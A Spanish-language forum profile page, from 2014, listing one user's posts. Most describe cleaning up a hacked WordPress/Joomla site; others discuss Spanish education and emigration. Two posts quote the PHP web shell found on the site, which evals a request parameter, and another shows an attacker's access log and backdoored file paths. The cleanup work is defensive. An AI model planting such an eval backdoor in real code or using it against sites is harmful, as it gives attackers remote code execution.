últimos mensajes de: #!drvy - Página 1

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

25 Julio 2014, 21:56

Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 292

1	Seguridad Informática / Seguridad / Re: Los sistemas de gestión de vuelo, ¿podrían ser vulnerables?	en: Hoy a las 21:49
https://www.youtube.com/watch?v=pbgeLRvjirI Saludos

2	Programación / Desarrollo Web / Re: Mi Wordpress Hackeado	en: Hoy a las 19:31
Citar (si es un customlog). Yo creo que es un link, porque cuando estuve en el FTP, le cambie el nombre para ver si generaba mas errores y no tener que descargar los 30MB.. y seguía rellenando el mismo archivo aunque tuviese nombre distinto xD Saludos

3	Foros Generales / Foro Libre / Re: La educación en España es una estafa	en: Hoy a las 18:00
Bueno, el trabajo es trabajo, tienes razón... Pero si has perdido tantos años estudiando algo que probablemente no vayas a trabajar en tu vida.. ¿ es un poco inútil estudiar no ? Para eso, termino la obligatoria y me busco la vida.. y no hace falta ni universidad ni FP ni nada.. Yo creo que por mucho que les gustaría trabajar aquí a esos ingenieros, si España no les da trabajo en lo que les ha enseñado, están casi obligados a irse. De este modo, Alemania y otros países se lo pasan bomba, porque todos invertimos dinero en que esta gente aprenda, y resulta que ellos se van a otro país que ya no tiene que invertir en ellos... solo cobrarles impuestos ... Saludos

4	Foros Generales / Foro Libre / Re: La educación en España es una estafa	en: Hoy a las 17:45
Citar Se da opciones, no se obliga a la juventud a irse. En el mismo curso que comente antes, tenia una compañera con master en ese area que se mato trabajando como camarera/cantante de coro y otros para pagarse los estudios.. ahora trabaja en una fabrica de galletas, en la linea quitando las que están mal hechas... El 89% de los españoles que emigran en busca de empleo cuenta con educación superior Un estudio del Real Instituto Elcano realizado entre 7.000 personas revela que la mayoría de los emigrantes son hombres y que la profesión que más abunda son los ingenieros. http://economia.elpais.com/economia/2013/11/07/empleo/1383838356_819951.html Unos 5000 españoles trabajan sin papeles en el puerto de Tánger en Marruecos Así, las autoridades españolas calculan que hay a 5000 españoles sin permiso de trabajo en la región, muchos de ellos en puestos cualificados. Mientras que algunos consiguen un puesto regular otros se ven forzados a trabajar en negro. http://trabajo.excite.es/unos-5000-espanoles-trabajan-sin-papeles-en-el-puerto-de-tanger-en-marruecos-N41781.html ¿ Opciones de que ? ¿ De ser ingeniero y trabajar como peón ? Saludos

5	Foros Generales / Foro Libre / Re: Juego: Estas baneado por....	en: Hoy a las 15:13
Baneo a @Bryantcore y a @synthesize por no seguir las normas del juego ¬¬ Saludos

6	Programación / Desarrollo Web / Re: Mi Wordpress Hackeado	en: Hoy a las 05:32
En un principio si aunque hay que analizar el joomla por si tiene mas .. "secretos". Dile a tu amiga que te lo pague bien xD Saludos

7	Programación / Desarrollo Web / Re: Mi Wordpress Hackeado	en: Hoy a las 05:06
Citar Debo comentarlas como has hecho tu o lo estás modificando vos? He borrado las lineas directamente.. eso no puede ser de joomla.. tiene que haber sido modificado por algun h4x0r xD Citar Igualmente me gustaría saber como hacen para encontrar los ARCHIVOS CON LAS LÍNEAS ESAS QUE CONTIENEN "ERRORES" y que son las que debemos modificar... Todo esta en el access-log.txt que tienes al principio cuando entras al FTP.. el problema es que ese log solo muestra lo que se ha visitado.. si el tipo ese ha metido mas en otro lado... jodido. PD: @MinusFour, si quieres te paso el access-log ? Saludos

8	Programación / Desarrollo Web / Re: Mi Wordpress Hackeado	en: Hoy a las 05:00
@MinusFour tienes razon, y estoy comenzado a sospechar que esos archivos fueron intencionadamente modificados... todos contienen la misma linea.. Código: /peritajedearte/administrator/templates/hathor/html/com_admin/profile/edit.php?req= /peritajedearte/tmp/install_530f47f438c16/packages/install_530f47f49d5c7/helpers/captcha/captcha.php?req= peritajedearte/administrator/components/com_users/views/groups/view.html.php?req= /peritajedearte/administrator/components/com_templates/helpers/template.php?req= Saludos

9	Programación / Desarrollo Web / Re: Mi Wordpress Hackeado	en: Hoy a las 04:50
Si se me olvido mencionarlo.. El archivo esta en peritajedearte/plugins/editors/jckeditor/jckeditor/includes/ckeditor/autoload/startconfig.php La linea uno contenía lo que puse en el post de arriba, y ahora tiene Código <?php #$post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?> PD: En teoria esta todo solucionado, aunque con tantas vulnerabilidades eso era un nido de malware xD Saludos

10	Programación / Desarrollo Web / Re: Mi Wordpress Hackeado	en: Hoy a las 04:44
En el archivo litermalmente pone esto: Código: <?php $post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?> PD: He comentado la linea.. no debería dar mas problemas. PD2: Como sugerencia, dile a tu amiga que siempre actualice y que use una contraseña mas segura.. Saludos

11	Programación / Desarrollo Web / Re: Mi Wordpress Hackeado	en: Hoy a las 04:40
Efectivamente, como ha mencionado @MinusFour, ese archivo ejecuta directamente el php, es vulnerable. Lo que si he podido aislar es el ataque.. Código: 176.31.251.103 - - [06/Jul/2014:21:23:24 -0300] "GET /wp-login.php HTTP/1.1" 200 2827 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:25 -0300] "POST /wp-login.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:26 -0300] "GET /wp-admin/ HTTP/1.1" 200 69338 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:29 -0300] "GET /wp-admin/ HTTP/1.1" 200 69338 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:31 -0300] "GET /wp-admin/theme-editor.php HTTP/1.1" 200 33381 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:32 -0300] "GET /wp-admin/theme-editor.php?file=404.php&theme=wilborada HTTP/1.1" 200 18746 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:33 -0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:34 -0300] "GET /theme-editor.php?file=404.php&theme=wilborada&scrollto=0&updated=true HTTP/1.1" 404 151 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:35 -0300] "POST /wp-content/themes/wilborada/404.php HTTP/1.1" 200 47 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:36 -0300] "GET /wp-content/themes/wilborada/systemcash.php HTTP/1.1" 200 120 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:38 -0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:39 -0300] "GET /theme-editor.php?file=404.php&theme=wilborada&scrollto=0&updated=true HTTP/1.1" 404 3 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" El atacante obtuvo aceso logueandose, modifico el 404.php del tema, lo abrio y lo volvio a modificar. Tambien se ve el primer acceso a systemcash.php.. despues, hay entradas de bots con UA (Mozilla 3.0) que acceden a el muchisimas veces. Todos los archivos sospechosos están borrados sin embargo (y no he sido yo) xD Estoy mirando el archivo ese de joomla. Saludos

12	Programación / Desarrollo Web / Re: Mi Wordpress Hackeado	en: Hoy a las 04:01
Lo mas raro de todo es que si estas logueado, si que puedes visualizar el tema perfectamente.. pero si no estas logueado, ves la plantilla esa... Valeeee. Arreglado, el functions.php del tema, tenia su propio modo mantenimiento y estaba (de alguna manera) activado. @ka0s, he comentado la linea 25 del functions.php para quitar el modo mantenimiento por si lo quieres volver a poner en algun momento. Ahora toca mirar la vulnerabilidad esa.. Saludos

13	Programación / Desarrollo Web / Re: Mi Wordpress Hackeado	en: Hoy a las 03:50
He mirrado el error-log.txt son unos 57mb y toooooooooodas las entradas son del tipo esto: Código: [Thu Jul 24 22:49:07 2014] [error] [client (Una ip va aqui xD)] Zend Optimizer requires Zend Engine API version 220060519. [Thu Jul 24 22:49:07 2014] [error] [client (Una ip va aqui xD)] The Zend Engine API version 220090626 which is installed, is newer. [Thu Jul 24 22:49:07 2014] [error] [client (Una ip va aqui xD)] Contact Zend Technologies at http://www.zend.com/ for a later version of Zend Optimizer. Raro xD Saludos

14	Programación / Desarrollo Web / Re: Mi Wordpress Hackeado	en: Hoy a las 03:38
Ya lo mire no tiene ninguno. Parece que lo que falla es el tema actual.. si vuelve a los defaults de Wordpress si que funciona. Saludos

Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 292

lawebdegoku	MundoDivx	Hispabyte	Truzone	ZonaPhotoshop
Yashira.org	indetectables.net	Seguridad Colombia	Indejuegos	Seguridad Informática
Internet móvil	Noticias Informatica	ADSL	eNYe Sec	Seguridad Wireless
Underground México	Soluciones Web	El Lado del Mal	Blog Administrador Sistemas	Blog Uxio
thehackerway	Tienda Wifi

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.19 | SMF © 2006-2008, Simple Machines